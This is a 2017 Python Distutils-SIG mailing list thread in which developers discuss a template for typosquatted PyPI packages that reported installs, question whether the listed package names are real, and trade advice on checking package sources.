This makes me remember https://hackernoon.com/building-a-botnet-on-pypi-be1ad280b8d6 on a related note.
On Thu, Jun 1, 2017 at 7:40 PM, Thomas Kluyver <tho...@kluyver.me.uk> wrote: > On Thu, Jun 1, 2017, at 06:32 PM, Matt Joyce wrote: > > It's basically a test dummy package that reports users who have ran that > package template. > > > That's what I thought, but all the code to do the upload seems to have > been removed before s/he built those packages. Now it's just a harmless > warning, unless I'm missing something. > > https://github.com/fate0/cookiecutter-evilpy-package/commit/ > a3ed1e1e060748b0444158ea3bc569dfbf57645e > > the site referenced lists the package name that the user ran to get posted > to the site. there appear to be many packages in pypi that are built off > this fatezero template. > > > There *appear* to be, but I checked several of the names listed there, and > they're not on PyPI: > > https://pypi.python.org/pypi/tkinter > https://pypi.python.org/pypi/memcached > https://pypi.python.org/pypi/vtk > https://pypi.python.org/pypi/python-dev > https://pypi.python.org/pypi/opencv > > So I wonder if the data is fake. Or maybe they were already taken down? Or > the installations are real, but not using those names. > > pypi is not a very good package management solution. most folks I advise > to build from pypi in CI/CD but push to production via a real package > management solution such as apt or yum. always double check sources coming > from the internet. > > > It's an open repository that anyone can upload to. That has its drawbacks > and its advantages. > > > _______________________________________________ > Distutils-SIG maillist - Distutils-SIG@python.org > https://mail.python.org/mailman/listinfo/distutils-sig > >
_______________________________________________ Distutils-SIG maillist - Distutils-SIG@python.org https://mail.python.org/mailman/listinfo/distutils-sig
